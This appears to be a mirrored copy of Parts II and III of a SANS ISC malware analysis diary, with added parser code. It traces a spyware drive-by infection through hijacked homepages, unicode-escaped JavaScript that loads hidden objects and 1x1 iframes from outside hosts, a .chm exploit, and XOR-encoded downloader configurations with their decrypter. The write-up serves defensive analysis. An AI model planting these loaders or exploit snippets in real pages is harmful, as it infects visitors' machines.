Object-3=/F1/objects/KVIF_11.dll
InstallName-3=KVIF_11.dll
RepURL-3=http://www.f1organizer.com/F1/audit/Ack/Syn4F1_KVI.htm
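An added example (my code, not part of the diary): a parser for this Cmd4F1 instruction format that lists the URLs it orders downloaded, the name each file takes on disk, the shortcuts it plants, and where the next instruction file lives. The sample is an excerpt stitched together from the two listings on this page; the function names are mine.

```python
import re

# Excerpt stitched from the two Cmd4F1 files quoted on this page (constructed
# sample): a [NextConfigFile] pointer, one [AddF*] shortcut and three
# [UpdateList] groups, including one with the odd "-4" key suffix.
SAMPLE_CONFIG = r"""[NextConfigFile]
Server=www.f1organizer.com
Object=/F1/audit/DMOnewSB/Cmd4F1_fr03t_Upd3.txt

[AddF4]
Folder=..\\Desktop\\
Link=http://www.007arcadegames.com
Name=007arcadegames.com
IconFile=http://www.007arcadegames.com/007.ico
IconIndex=0

[UpdateList]
Server1=www.f1organizer.com
Object1=/F1/objects/msbb693.dll
InstallName1=msbb321.dll
RepURL1=http://www.f1organizer.com/F1/audit/Ack/Ack4F1_nCase321.htm

Server2=www.AddictiveTechnologies.net
Object2=/LoadShare/SplWbr.dll
InstallName2=SplWbr.dll
RepURL2=http://www.f1organizer.com/F1/audit/Ack/Ack4SB2.htm

Server-4=www.f1organizer.com
Object-4=/F1/objects/ezStD.dll
InstallName-4=ezStub3.dll
RepURL-4=http://www.f1organizer.com/F1/audit/Ack/Syn4F1_eZula.htm
"""

# Key = base name plus a numeric tag; the tag may carry a leading minus sign.
UPD_KEY = re.compile(r"^(Server|Object|InstallName|RepURL)(-?\d+)$")


def parse_ini(text):
    """Minimal parser for the Cmd4F1 layout: [Section] headers, Key=Value lines,
    blank lines ignored. Returns {section: [(key, value), ...]} in file order."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, [])
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)  # values may themselves contain '='
            sections[current].append((key.strip(), value.strip()))
    return sections


def update_entries(sections):
    """Group [UpdateList] keys by their tag. The tag is only a label (the page's
    second file jumps from 4 to -4, -6, -3), so group on the literal string."""
    groups = {}
    for key, value in sections.get("UpdateList", []):
        m = UPD_KEY.match(key)
        if m:
            groups.setdefault(m.group(2), {})[m.group(1)] = value
    return list(groups.values())  # dict keeps first-seen order


def download_urls(sections):
    """Every file the config orders downloaded, as (URL, on-disk name)."""
    return [("http://" + e["Server"] + e["Object"], e.get("InstallName"))
            for e in update_entries(sections) if "Server" in e and "Object" in e]


def renamed_on_install(sections):
    """Downloads whose on-disk name differs from the served filename, so a host
    search for the filename seen in the proxy log would miss them."""
    return [(url, name) for url, name in download_urls(sections)
            if name and url.rsplit("/", 1)[-1] != name]


def next_config_url(sections):
    """Where the next round of instructions will be fetched from, if any."""
    d = dict(sections.get("NextConfigFile", []))
    return "http://" + d["Server"] + d["Object"] if "Server" in d and "Object" in d else None


def added_links(sections):
    """[AddF*] sections: shortcuts written into Favorites folders or the Desktop."""
    out = []
    for name, items in sections.items():
        if name.startswith("AddF"):
            d = dict(items)
            out.append((d.get("Folder"), d.get("Name"), d.get("Link")))
    return out
```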
Just looking at that list makes me tired. (And the name "ezStD" makes me laugh… For those non-English speakers out there, STD is an acronym for "Sexually Transmitted Disease" :-) I could slog down through the whole sorry mess, and perhaps I will if there is enough interest, but for now let's take a look at another area where Joe is no longer the 0wner of his P.C.: his homepage.

Joe's homepage was changed in the initial "drive-by" to be "http://default-homepage-network.com/start.cgi?new-hkcu". The next time that Joe fires up IE, here’s what he gets (suitably edited to remove superfluous crud):
<html><head>
<title>Default Homepage Network</title>
</head>
<body>
[script language=javascript]
<!--
var agt=navigator.userAgent.toLowerCase();
var is_ie = (agt.indexOf("msie") != -1);
var is_aol = (agt.indexOf("aol") != -1);

if (!is_aol) {
self.moveTo(0,0);
self.resizeTo(screen.availWidth,screen.availHeight);
}
location.href="http://default-homepage-network.com/newspynotice.html"
if (!is_aol) {
var expdate = new Date((new Date()).getTime() + 600000);
if (document.cookie.indexOf("delayed") == -1) {
document.cookie=
"delayed=general; expires=" + expdate.toGMTString() + "; path=/;";
splashWin2 = window.open("",'y','fullscreen=1,toolbar=0,location=0,\
directories=0,status=0,menubar=0,scrollbars=0,resizable=0');
splashWin2.blur();
window.focus();
splashWin2.resizeTo(10,10);
splashWin2.moveTo(5000,5000);
splashWin2.location="http://object.passthison.com/aff/delayed/";
window.focus();
}
}
//-->
[/script]</body>
The referenced file, "newspynotice.html," is another rather interesting little gem. It displays a big red stop sign, and explains that poor Joe’s computer may be infected with spyware. Has Joe noticed that his home page has been changed? (Well, duh!) Has his computer been acting "wierd" lately? (Why can’t these malware clowns spell?) Is the Internet "running slow or crashing?" If so, Joe simply needs to click on a link on the page and his "computer will be back to normal and secure again in just a few minutes." Oh, joy... oh, joy. But, hidden within the HTML of this “IMPORTANT SECURITY NOTICE!” page is a little surprise:
<!-- 1. newobj1 -->

[script type="text/javascript"]document.write('\u003c\u0073\u0063\u0072\u0069\u0070
\u0074\u0020\u006c\u0061\u006e\u0067\u0075\u0061\u0067\u0065\u003d\u006a
\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u000d\u000a
\u0076\u0061\u0072\u0020\u006f\u0050\u006f\u0070\u0075\u0070\u0020\u003d
\u0020\u0077\u0069\u006e\u0064\u006f\u0077\u002e\u0063\u0072\u0065\u0061
\u0074\u0065\u0050\u006f\u0070\u0075\u0070\u0028\u0029\u003b\u000d\u000a
\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0073\u0068\u006f
\u0077\u0050\u006f\u0070\u0075\u0070\u0028\u0029\u000d\u000a\u007b\u000d
\u000a\u0009\u006f\u0050\u006f\u0070\u0075\u0070\u002e\u0064\u006f\u0063
\u0075\u006d\u0065\u006e\u0074\u002e\u0062\u006f\u0064\u0079\u002e\u0069
\u006e\u006e\u0065\u0072\u0048\u0054\u004d\u004c\u0020\u003d\u0020\u0022
\u003c\u006f\u0062\u006a\u0065\u0063\u0074\u0020\u0064\u0061\u0074\u0061
\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u006f\u0062\u006a\u0065
\u0063\u0074\u002e\u0070\u0061\u0073\u0073\u0074\u0068\u0069\u0073\u006f
\u006e\u002e\u0063\u006f\u006d\u002f\u0076\u0075\u0030\u0038\u0033\u0030
\u0030\u0033\u002f\u006e\u0065\u0077\u006f\u0062\u006a\u0065\u0063\u0074
\u0031\u002e\u0063\u0067\u0069\u003e\u0022\u003b\u000d\u000a\u0009\u006f
\u0050\u006f\u0070\u0075\u0070\u002e\u0073\u0068\u006f\u0077\u0028\u0030
\u002c\u0030\u002c\u0031\u002c\u0031\u002c\u0064\u006f\u0063\u0075\u006d
\u0065\u006e\u0074\u002e\u0062\u006f\u0064\u0079\u0029\u003b\u000d\u000a
\u007d\u000d\u000a\u0073\u0068\u006f\u0077\u0050\u006f\u0070\u0075\u0070
\u0028\u0029\u003b\u000d\u000a\u003c\u002f\u0073\u0063\u0072\u0069\u0070
\u0074\u003e')[/script]

<!-- 2. e1 -->

[script type="text/javascript"]document.write('\u003c\u0069\u0066\u0072\u0061\u006d
\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a
\u002f\u002f\u0036\u0039\u002e\u0035\u0030\u002e\u0031\u0033\u0039\u002e
\u0036\u0031\u002f\u0068\u0070\u0031\u002f\u0068\u0070\u0031\u002e\u0068
\u0074\u006d\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0031\u0020
\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u003e\u003c\u002f\u0069
\u0066\u0072\u0061\u006d\u0065\u003e')[/script]
A little decoding gives us Part 1:
[script language=javascript]
var oPopup = window.createPopup();
function showPopup() {
oPopup.document.body.innerHTML = "<object\
data=http://object.passthison.com/vu083003/newobject1.cgi>";
oPopup.show(0,0,1,1,document.body);
}
showPopup();
[/script]
And Part 2:
[iframe src="http://69.50.139.61/hp1/hp1.htm" width=1 height=1][/iframe]
This recalls the hp2.htm file that was downloaded and installed in Part I of this epic adventure. Same site, same method, same result:
<!-- NEW Z.D.E.-D.B.D. w/ vu083003-H.P.S. (c) April 2004 SmartBot -->

[script type="text/javascript"]document.write('\u003c\u0074\u0065\u0078\u0074\u0061
\u0072\u0065\u0061\u0020\u0069\u0064\u003d\u0022\u0063\u006f\u0064\u0065
\u0022\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073
\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u003b\u0022\u003e
\u000d\u000a\u0020\u0020\u0020\u0020\u003c\u006f\u0062\u006a\u0065\u0063
\u0074\u0020\u0064\u0061\u0074\u0061\u003d\u0022\u0026\u0023\u0031\u0030
\u0039\u003b\u0073\u002d\u0069\u0074\u0073\u003a\u006d\u0068\u0074\u006d
\u006c\u003a\u0066\u0069\u006c\u0065\u003a\u002f\u002f\u0043\u003a\u005c
\u0066\u006f\u006f\u002e\u006d\u0068\u0074\u0021\u0024\u007b\u0050\u0041
\u0054\u0048\u007d\u002f\u0048\u0050\u0031\u002e\u0043\u0048\u004d\u003a
\u003a\u002f\u0068\u0070\u0031\u002e\u0068\u0074\u006d\u0022\u0020\u0074
\u0079\u0070\u0065\u003d\u0022\u0074\u0065\u0078\u0074\u002f\u0078\u002d
\u0073\u0063\u0072\u0069\u0070\u0074\u006c\u0065\u0074\u0022\u003e\u003c
\u002f\u006f\u0062\u006a\u0065\u0063\u0074\u003e\u000d\u000a\u003c\u002f
\u0074\u0065\u0078\u0074\u0061\u0072\u0065\u0061\u003e\u000d\u000a\u000d
\u000a\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u0020\u006c\u0061\u006e
\u0067\u0075\u0061\u0067\u0065\u003d\u0022\u006a\u0061\u0076\u0061\u0073
\u0063\u0072\u0069\u0070\u0074\u0022\u003e\u000d\u000a\u0020\u0020\u0020
\u0020\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0077\u0072
\u0069\u0074\u0065\u0028\u0063\u006f\u0064\u0065\u002e\u0076\u0061\u006c
\u0075\u0065\u002e\u0072\u0065\u0070\u006c\u0061\u0063\u0065\u0028\u002f
\u005c\u0024\u007b\u0050\u0041\u0054\u0048\u007d\u002f\u0067\u002c\u006c
\u006f\u0063\u0061\u0074\u0069\u006f\u006e\u002e\u0068\u0072\u0065\u0066
\u002e\u0073\u0075\u0062\u0073\u0074\u0072\u0069\u006e\u0067\u0028\u0030
\u002c\u006c\u006f\u0063\u0061\u0074\u0069\u006f\u006e\u002e\u0068\u0072
\u0065\u0066\u002e\u0069\u006e\u0064\u0065\u0078\u004f\u0066\u0028\u0027
\u0068\u0070\u0031\u002e\u0068\u0074\u006d\u0027\u0029\u0029\u0029\u0029
\u003b\u000d\u000a\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e
\u000d\u000a\u000d\u000a')[/script]
Once again, this isn’t difficult to decode, and results in:
<textarea id="code" style="display:none;">
[object data="&#109;s-its:mhtml:file://C:\foo.mht!${PATH}/HP1.CHM::/hp1.htm"\
type="text/x-scriptlet"][/object]
</textarea>
[script language="javascript"]
document.write(code.value.replace(/\${PATH}/g,location.href.substring\
(0,location.href.indexOf('hp1.htm'))));
[/script]
Another .chm exploit that will eventually result in the download and execution of a file called hp1.exe.
Here we go again... and trust me, hp1.exe is a real piece of work.
Stay tuned for Part III...
Note: When I first started writing this up, I was completely unaware of how deeply down the rabbit hole it would take me. I honestly believed that it would only be a fairly long diary entry... then two fairly long diary entries... and now it is obvious that we’re heading into three parts at the very least. I’ll try to get Part III (and any other remaining posts) up more quickly.
------------------------------------------------------------------------
 


Tom Liston´s Following the Bouncing Malware - Part III

Note: Most of the links in the following are not "clickable" on purpose. Think of it as a warning...

Before we begin our tumble down the rabbit hole once more, just a few brief words:

For those of you who have been following this little excursion: thank you for your patience. It’s probably difficult to completely understand the amount of time that each of these little essays takes to research and write. While I’ve been working on this particular installment, there were also the distractions of family, job, the daily “stuff” coming in at the SANS ISC, MS04-028, GDIScan, turning the ISC into the GDIScan helpdesk (sorry gang!), windsurfing the halls at NS2004 in Vegas, etc..., etc... You have my sincere apologies for the wait, as well as my fervent hope that it was worth it.

With that out of the way, why don’t we “warm up” by quickly retracing the path we’ve already trod? Perhaps now would be a good time to take a bathroom break and grab a fresh container of your favorite adult beverage, ‘cause once this caravan rolls, we ain’t stoppin’. Go on, I’ll wait...

Ready? Good. Let’s go!

In the beginning, there was Joe Average. And Joe didst buy himself a computer and conneceth it to the Internet. And with his computer, Joe did surfeth, and readeth email, and playeth many games. And Joe looked upon the Internet, and it was Good.

But while Joe did possess knowledge of the Internet Good, he did not understand that Evil too lived on the Internet. And he patcheth not.

Then one day, Joe didst unknowingly go to a Bad Place, and much Evil befell his shiny new computer.

How Evil? Very, VERY Evil:


From Follow The Bouncing Malware, Part I
(http://isc.sans.org/diary.php?date=2004-07-23 ):

1) Joe's homepage had been changed. It is now set to:
http://default-homepage-network.com/start.cgi?new-hkcu

2) Joe’s default search page has been set to:
http://server224.smartbotpro.net/7search/?new-hkcu

3) Search assist has been turned off.

4) "TV Media Display" has been installed on Joe's machine.

5) addictivetechnologies.net had graced Joe's machine with a file identified by AV software as Win32/TrojanDownloader.Rameh.C.

And, from Follow The Bouncing Malware, Part II
(http://isc.sans.org/diary.php?date=2004-08-23 ):

6) Joe’s computer, at the behest of the Addictive Technologies malware, downloaded “instructions” from F1Organizer.com

7) Following those instructions, new “Favorites” were added to Joe’s browser, and two new “gifts” (SplWbr.dll and ezbdlLs.dll) were installed on his computer.

8) The installation of SplWbr.dll dumped an “Ad Destroyer and Virtual Bouncer” from SpyWare Labs, Inc. and “TopRebates.com AutoTrack software” onto Joe’s computer.

9) The installation of ezbdlLs.dll dropped a “Utility for downloading files and upgrading software” from “ABetterInternet”, a utility to “Make Your Internet Browsing Simple, Exciting, and Personal” from the fine folks at “ezULA”, and an affiliate ID hijacker called SAHAgent onto Joe’s PC.

10) Finally, the file hp1.exe was downloaded and executed via a .CHM exploit.

That’s where we stopped last time, with my promise that the file “hp1.exe” was “a real piece of work.”

So... let’s take a look at hp1.exe.

The file hp1.exe contains 49,152 bytes o’ Visual Basic goodness (guffaw). The file’s version information claims that it was created by a company called “df”, with an internal name of “bigs104”. Launching this beastie begins bringing down a veritable rain of malware on a machine. Sit back and try to keep up as we follow the bouncing malware:

First, it contacts "http://mmm.roings.com/bundle.php?aff=bigs104" and downloads 1449 bytes of some sort of data:
388
{}{}{}wrds======ckkcha*gki+waevgl9uxwaevgl*}elkk*gki+waevgl9tx
}elkk*gki+v+w|+.9txv`w*}elkk*gki+9txwaevgl*iwj*gki+vawqhpw*ewt9ux
eqpk*waevgl*iwj*gki+vawqhpw*ewt9uxc*iwj*gki+9ux
ekhwaevgl*gki+ekhgki+waevgl9uqav}xwaevgl*ekh*gki+ekhgki+waevgl9uqav}x
ehhplasaf*gki+waevgl9uxsaf*ewo*gki+saf9uxkravpqva*gki+`+waevgl9Oa}skv`wx
gkjpajp*kravpqva*gki+`+waevgl9Oa}skv`wxiw|ih*mjbkwtega*gki+lkia+`kc9uosx
mjbkwtega*gki+lkia+`kc9uosxwaevgl*japwgeta*gki+jw+waevgl9uqav}x
japwgeta*gki+jw+waevgl9uqav}xehpermwpe*gki+saf+vawqhpw9ux
waevgl*h}gkw*gki+`abeqhp*ewt9uqav}xh}gkw*gki+waevgl*ewt9uqav}x
waevgl*aevplhmjo*jap+pvego9uxwaevgl*hkkowievp*gki+t+waevgl9up
{}{}{}doms======faewp}wtkvpeh*2|*pk9995xxxgavmeh~*gki9996xxx
`vmjoi}*gki9995
{}{}{}ver======17
{}{}{}pay======yes
{}{}{}ip======aa.bbb.cc.dd (note: this was Joe’s machine’s IP address)
{}{}{}phases======`veckjfehh~9995xxxgvegow9996xx
mb$}kq$qwa$plmw$wmpa9995
{}{}{}sewers======wa|$bkv$bvaa9995xxxwa|9996xxxikva$wa|$bkv$ia9995
12
{}{}{}outers======
175
xxxxxi}a|a999lppt>++fmjw6*ia`me)ikpkv*jap+wkbp+hke`w+999i}a|a999999EHHx
JQHHxxxxxerepev999lppt>++sss*erepevvawkqvgaw*gki+`mwp+ewp[0[ii*a|a999ewp[0
[ii*a|a999ewp[0[ii*a|a999QWxAFxEQxGExCFxxxxx
a6cmra999lppt>++fmjw6*ia`me)ikpkv*jap+wkbp+Ia`meIkpkv61*a|a999Ia`meIkpkv61*
a|a999Ia`meIkpkv61*a|a999QWxGExxxxx
qjwpeh999lppt>++qtw*vkmjcw*gki+wkbp+qjwpehh*a|a999qmjwpehhav999999EHHx
JQHH
f
{}{}{}reg======
5c
xxxxxkg|5<999lppt>++fmjw6*ia`me)ikpkv*jap+wkbp+ii64*kg|999ii64*kg|999ii64*kg|
999EHHxQWxGExAF
6
{}{}{}
0
(Note: the data has been reformatted to display better in the Diary.)

Well, what the heck does all of that mean? Hmmm... it’s obviously a “generated on the fly” data file, because the file contained, in plain-text, the IP address of the NAT firewall that Joe’s machine was behind. It also appears to have been “encrypted” in some manner.

Given some time, and several pieces of paper wadded up and thrown at the cat in frustration, your intrepid author cracked the code, and wrote the following program to decrypt the data:
#include <stdio.h>

/* Decrypts the "df" control data: every byte except a newline has bit 2
   toggled (+4 if that bit is clear, -4 if it is set, i.e. XOR 4). */
int main(int ac, char **av) {
    FILE *in, *out;
    char buffer[80], *c, val;
    int cont = 1;

    if(ac != 2){puts("Usage: df_decrypt filename"); return 1;}
    if((in = fopen(av[1], "r")) == NULL){puts("Cannot open input file."); return 2;}
    if(!(out = fopen("output.txt", "w"))){puts("Cannot open output file."); return 3;}
    while(cont){
        if(fgets(buffer, sizeof(buffer), in)){
            c = buffer;
            while(*c){
                if(*c != '\n'){
                    val = *c & 7;            /* low three bits decide the direction */
                    if(val < 4) *c = *c + 4;
                    else *c = *c - 4;
                }
                c++;
            }
            fputs(buffer, out);
        } else cont = 0;
    }
    fclose(in); fclose(out);
    return 0;
}
Filling the decrypted data back into the file alongside any original data that is obviously “keywords” results in the following unencrypted file:
388
{}{}{}wrds======google.com/search=q|search.yahoo.com/search=p|
yahoo.com/r/sx/*=p|rds.yahoo.com/=p|search.msn.com/results.asp=q|
auto.search.msn.com/results.asp=q|g.msn.com/=q|aolsearch.com/aolcom/search=query|
search.aol.com/aolcom/search=query|alltheweb.com/search=q|web.ask.com/web=q|
overture.com/d/search=Keywords|content.overture.com/d/search=Keywords|
msxml.infospace.com/home/dog=qkw|infospace.com/home/dog=qkw|
search.netscape.com/ns/search=query|netscape.com/ns/search=query|
altavista.com/web/results=q|search.lycos.com/default.asp=query|
lycos.com/search.asp=query|search.earthlink.net/track=q|
search.looksmart.com/p/search=qt
{}{}{}doms====== beastysportal.6x.to===1|||cerialz.com===2|||drinkmy.com===1
{}{}{}ver======17
{}{}{}pay======yes
{}{}{}ip======aa.bbb.cc.dd (note: this was Joe’s machine’s IP address)
{}{}{}phases====== dragonballz===1|||cracks===2||if you use this site===1
{}{}{}sewers====== sex for free===1|||sex===2|||more sex for me===1
12
{}{}{}outers======
175
|||||myexe===http://bins2.media-motor.net/soft/loads/
===myexe======ALL|NULL
|||||avatar===http://www.avatarresources.com/dist/ast_4_mm.exe
===ast_4_mm.exe===ast_4_mm.exe===US|EB|AU|CA|GB
|||||e2give===http://bins2.media-motor.net/soft/MediaMotor25.exe
===MediaMotor25.exe===MediaMotor25.exe===US|CA
|||||unstal===http://ups.roings.com/soft/unstall.exe
===uinstaller======ALL|NULL
f
{}{}{}reg======
5c
|||||ocx18===http://bins2.media-motor.net/soft/mm20.ocx
===mm20.ocx===mm20.ocx===ALL|US|CA|EB
6
{}{}{}
0
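A Python port of the decrypter above, as an added example rather than the diary's code, that also handles the framing the raw listing shows: the bare hex lines 388, 12, 175, f, 5c, 6 and 0 are HTTP/1.1 chunked-transfer-encoding size lines (0x12 = 18 is exactly the length of "{}{}{}outers======", 0xf = 15 that of "{}{}{}reg======", and the same framing shows up as the 566 and 0 around the PHP warnings further down). The download is therefore dechunked first, then split on the {}{}{} record markers, and only the obfuscated fields are put through the XOR-4 transform, since ver, pay and ip were already plaintext. The sample body is built from the first records of the capture; the 97-byte chunk size and the aa.bbb.cc.dd address are placeholders, not the real values.

```python
"""Added example (not from the diary): a decoder for the "df" control file.

Two things the page's listing supports:
  * the bare hex lines ("388", "12", "175", "f", "5c", "6", "0") are HTTP/1.1
    chunked-transfer-encoding size lines, so the body must be reassembled
    before parsing; and
  * the C decrypter's "+4 if bit 2 is clear, -4 if set" is simply XOR 0x04.
"""

# Fields whose values were obfuscated in the capture; ver, pay and ip were plain.
ENCODED_FIELDS = {"wrds", "doms", "phases", "sewers", "outers", "reg"}


def xor4(text: str) -> str:
    """Flip bit 2 of every character except line breaks (same as the C program)."""
    return "".join(ch if ch in "\r\n" else chr(ord(ch) ^ 0x04) for ch in text)


def dechunk(raw: bytes) -> bytes:
    """Reassemble an HTTP/1.1 chunked body: <hex-size>CRLF<data>CRLF ... 0CRLF."""
    body = bytearray()
    pos = 0
    while True:
        eol = raw.index(b"\r\n", pos)
        size = int(raw[pos:eol].split(b";")[0], 16)   # drop any chunk extension
        pos = eol + 2
        if size == 0:                                  # last-chunk marker
            return bytes(body)
        body += raw[pos:pos + size]
        pos += size + 2                                # skip the CRLF after the data


def chunk(body: bytes, size: int) -> bytes:
    """Inverse of dechunk; used only to build the constructed sample below."""
    framed = bytearray()
    for i in range(0, len(body), size):
        piece = body[i:i + size]
        framed += b"%x\r\n" % len(piece) + piece + b"\r\n"
    return bytes(framed + b"0\r\n\r\n")


def parse_records(body: str) -> dict:
    """Split '{}{}{}key======value' records, decoding the obfuscated values."""
    records = {}
    for rec in body.split("{}{}{}"):
        if "======" not in rec:
            continue                                   # leading '' and the empty terminator
        key, value = rec.split("======", 1)
        value = value.strip("\r\n")
        records[key] = xor4(value) if key in ENCODED_FIELDS else value
    return records


def decode_control_file(raw: bytes) -> dict:
    """Full pipeline: chunked HTTP body -> records -> de-obfuscated fields."""
    return parse_records(dechunk(raw).decode("latin-1"))


# Constructed sample: the first records of the page's capture, re-framed here
# with 97-byte chunks (the real chunk sizes were 0x388, 0x12, ...); ip keeps
# the diary's aa.bbb.cc.dd placeholder.
SAMPLE_BODY = (
    "{}{}{}wrds======ckkcha*gki+waevgl9uxwaevgl*}elkk*gki+waevgl9tx\r\n"
    "{}{}{}doms======faewp}wtkvpeh*2|*pk9995xxxgavmeh~*gki9996xxx`vmjoi}*gki9995\r\n"
    "{}{}{}ver======17\r\n"
    "{}{}{}pay======yes\r\n"
    "{}{}{}ip======aa.bbb.cc.dd\r\n"
    "{}{}{}phases======`veckjfehh~9995xxxgvegow9996\r\n"
    "{}{}{}"
)
SAMPLE_RAW = chunk(SAMPLE_BODY.encode("latin-1"), 97)


if __name__ == "__main__":
    for key, value in decode_control_file(SAMPLE_RAW).items():
        print(f"{key:>6}: {value}")
```

Because XOR 4 is its own inverse, the same xor4() both decodes a captured file and lets you regenerate test fixtures from the plaintext, which is handy when writing a detection for the record markers and the search-engine hijack list in the wrds field.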
After downloading this “control data” file, Joe’s computer then contacts "http://www.mastermind.com/a?l=PeAyF1sgrZYw&i=aaa.bbb.ccc.ddd" on TCP port 8010 (where aaa.bbb.ccc.ddd is Joe’s computer’s IP address) and has three lines of data returned: “2”, “US”, “0”.

This ties in with what appear to be “country codes” found within various portions of the unencrypted data file. It appears that the malware will react differently depending on the country where the infected machine is located. The script at www.mastermind.com takes the IP address and returns a country code. The other two codes (“2” and “0”) appear to control different aspects of the malware’s behavior.

Immediately upon receiving the “US” country code from mastermind.com, Joe’s computer contacts "http://bins2.media-motor.net/soft/mm20.ocx" and downloads, installs, and registers this 61,440 byte OCX. Examining this file, it appears to be an OCX version of hp1.exe. It contains many of the same strings, and appears to offer the same functionality. I would assume that it acts as a resident version of hp1.exe.

Next, hp1.exe contacts "http://bins2.media-motor.net/soft/loads/8-24.exe" and downloads a 40,960 byte executable. The “8-24” name is derived from the date at the time of the download (August 24th).

Based upon the “marching orders” within the unencrypted datafile, Joe’s computer now contacts "http://www.avatarresources.com/dist/ast_4_mm.exe" and downloads a 129,152 byte executable. It then contacts "http://bins2.media-motor.net/soft/MediaMotor25.exe" and downloads a 9,056 byte executable.

Both of these files are launched, and MediaMotor25.exe immediately initiates a download from "http://64.7.220.98/downloads/IeBHOs.dll" which is a 129,536 byte long BHO (Browser Helper Object) that is installed into (duh) IE (Internet Explorer). IeBHOs.dll is a known component of adware from “e2give.” Because it is installed into IE and becomes, essentially, part of the browser, it is in the perfect position to monitor the URLs being “surfed” and to change Joe's browser's requests when going to specific sites in order to “direct” affiliate commissions to e2give. According to the e2give.com website, “e2give will donate a portion of each qualifying purchase to the e2give charities network.” This, of course, makes it perfectly fine for them to install their software onto Joe’s machine without his permission. (Yes, that was sarcasm.)

The ast_4_mm.exe file from avatarresources.com is a Wise installation executable. As it installs, it phones home to let the fine folks at avatarresources know that it has found a new place to live:

"http://www.avatarresources.com/count/count.php?&mm2_us&mm2_new_nocpr"

The Wise installation has its own downloading engine which contacts the interestingly named “www.wenksdisdkjeilsow.com” and accesses the URL “http:// www.wenksdisdkjeilsow.com/config/?v=5&n=mm2&i=” which, despite the fact that it generates errors, sends back more configuration information (sheesh guys, if you’re going to go through all the trouble to set this stuff up, at least set the permissions correctly on your scripts...)
566
<br />
Warning: SAFE MODE Restriction in effect.
The script whose uid is 500 is not allowed to access
/usr/local/psa/home/vhosts/wenksdisdkjeilsow.com/httpdocs
/config/log owned by uid 10011 in/usr/local/psa/home
/vhosts/wenksdisdkjeilsow.com/httpdocs/config/index.php
on line 24<br /><br />
Warning: fopen("/usr/local/psa/home/vhosts
/wenksdisdkjeilsow.com/httpdocs/config/log", "a") -
Inappropriate ioctl for device in /usr/local/psa
/home/vhosts/wenksdisdkjeilsow.com/httpdocs
/config/index.php on line 24<br />
<br />
Warning: fputs(): supplied argument is not a
valid File-Handle resource in /usr/local/psa
/home/vhosts/wenksdisdkjeilsow.com/httpdocs/config/index.php
on line 25<br />
<br />
Warning: fclose(): supplied argument is not a
valid File-Handle resource in /usr/local/psa
/home/vhosts/wenksdisdkjeilsow.com/httpdocs/config/index.php
on line 26<br />
[URLS]
2,http://tt2.avres.net/tt/remove_spyware.exe
2,http://tt2.avres.net/tt/curgsi.exe
3,http://searchlocate.com/toolbar/searchlocate.exe

[VERSION]
5

[PROGRAM URL]
http://www.wenksdisdkjeilsow.com/files/ast_5_main.exe

[ID]
ArKJ9t9HzRnbf0GineJhq

[PRIORITY]
1,http://tt2.avres.net/tt/cpr_mm2.exe
2,http://tt2.avres.net/tt/ab1.exe
3,http://tt2.avres.net/tt/tvm_bundle.exe
4,http://tt2.avres.net/tt/cpr_mm2.exe

0
That’s just really BAD programming: you MUST check that those handles returned are valid when you open a file... dang... that’s Programming 101 Stuff. But I digress...

Hey! Look there! I see more URLs pointing to executable files. Gee, I wonder what’ll happen...?

Anyway... we now manage to round out the list of files that was in our original encrypted configuration data, and Joe’s machine goes out and grabs a file from "http://ups.roings.com/soft/unstall.exe." This actually does appear to be some sort of uninstall program, written in Visual Basic, and weighing in at 45,056 bytes. It only seems targeted at the files directly installed by the hp1.exe file, though.

But, lest we forget, we still have a Wise install running in the background. And, you guessed it, in “PRIORITY” order, it downloads:

"http://tt2.avres.net/tt/cpr_mm2.exe" (270,415 bytes)
"http://tt2.avres.net/tt/ab1.exe" (500,869 bytes)
"http://tt2.avres.net/tt/tvm_bundle.exe" (53,738 bytes)
"http://tt2.avres.net/tt/cpr_mm2.exe" (270,415 bytes - ????????)

Yes, you read that correctly. It DID download the exact same file twice. (It must be a personality trait of the morally bankrupt that they can be both clever and inane at the same time. The authors of these programs really do pull off some amazing stuff... but then they follow that up almost immediately by doing some amazingly STUPID stuff. Consistency guys, consistency...)
 
Link to Amateur Radio "Top Listed" Site
My Berkeley Open Infrastructure for Network Computing (BOINC) Stats
Scott Gillis (N3UJJ) Page Counter
 

My QTH
(Home Location)

Grid Square: FM18rv78rh

CQ Zone 5
I.T.U Zone 8

Latitude: 38.90970253171965
Longitude: -76.51880979537964

Latitude: N38° 54' 34''
Longitude: W76° 31' 7''

Latitude: 38.910°
Longitude: -76.519°

Find Your Longitude and Latitude here

Footer template last updated: October 6, 2013 10:12
Toyota of Waldorf Group Skydive